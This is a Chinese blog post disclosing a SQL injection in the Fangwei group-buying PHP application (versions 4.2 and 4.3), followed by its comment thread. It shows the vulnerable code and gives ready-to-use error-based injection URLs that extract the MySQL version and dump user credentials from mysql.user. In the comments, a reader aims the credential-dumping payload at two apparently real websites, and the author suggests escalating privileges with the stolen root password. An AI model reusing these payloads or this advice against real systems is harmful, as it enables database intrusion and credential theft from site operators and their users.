方维团购4.3最新版sql注入通杀4.2

\\app\source\goods_list.php
[php]
//团购分类
$sidegoodscatelist = getGoodsCate(" and pid=0 ");
$catepid = 0;//分类ID
$pid = 0;//顶级分类ID
$sub_cate_list = array();//次级分类
$is_top_cate = 0;//是否是顶级分类
if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")
{
$catepid = $_REQUEST['id']; //用来获取接收的参数id
foreach($sidegoodscatelist as $k => $v){
if($v['id']==$catepid)
{
$is_top_cate=1;
}
}

if($is_top_cate==0)
{
$sub_cate_list = getGoodsCate(" and pid=".$GLOBALS['db']->getOne("select pid from " . DB_PREFIX . "goods_cate where id=".$catepid));
//执行了select pid from " . DB_PREFIX . "goods_cate where id=."$_REQUEST['id']"
//导致了注入的发生
foreach($sub_cate_list as $kk => $vv)
{
if($vv['id']==$catepid)
{
$pid = $vv['pid'];
}
}
}
else
{
$sub_cate_list = getGoodsCate(" and pid=".$catepid);
$pid = $_REQUEST['id'];
}
}
$GLOBALS['tpl']->assign('sidegoodscatelist',$sidegoodscatelist);
//var_dump($sidegoodscatelist);exit;
$GLOBALS['tpl']->assign('catepid',$catepid);
$GLOBALS['tpl']->assign('sub_cate_list',$sub_cate_list);
$GLOBALS['tpl']->assign('is_top_cate',$is_top_cate);
$GLOBALS['tpl']->assign('pid',$pid);
//end团购分类
[/php]
可以看到
[php]if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")[/php]
假如m=goods,a=showcate并且传递的id值不为空
[php]$catepid = $_REQUEST['id'];[/php] //用来获取接收的参数id

再带入sql语句
[php]select pid from " . DB_PREFIX . "goods_cate where id=".$catepid[/php]
导致了注入的发生
1
exp:
1.判断mysql版本
[php]http://0day5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php]

3
2.获取mysql账号密码
[php]http://0day5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)[/php]
2

16 条评论

  1. 爆笑笑话

    感谢 辛苦整理这么多资料 简洁全面

    1. 0day5
      @爆笑笑话

      感谢你的支持~

  2. Ray

    应该是某37哪里的吧

  3. 小菜鸟

    老大能否写一个弄帐号密码的exp 你的我不会改

    1. 0day5
      @小菜鸟

      动下脑子有助于学习

  4. shy

    难道不能爆后台密码?哪有这么多root

    1. 0day5
      @shy

      能啊,这里只是举例子

  5. adsf

    话说爆出来的MYSQL密码怎么是41位的

    1. 0day5
      @adsf

      你仔细看图,有一个数字是多余的

    2. 0day5
      @adsf

      。。。。。。。。。。

  6. 神速小白

    http://tg.np5.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

    1. 0day5
      @神速小白

      这个...只是提供那啥,别做非法用途

  7. 神速小白

    http://qianrengou.com/index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

    1. 0day5
      @神速小白

      这个...只是提供那啥,别做非法用途

      1. asdfg
        @0day5

        :razz:爆出来的root 怎么用

        1. 0day5
          @asdfg

          如果可以外连,或者是有phpmyadmin的可以尝试提权

发表评论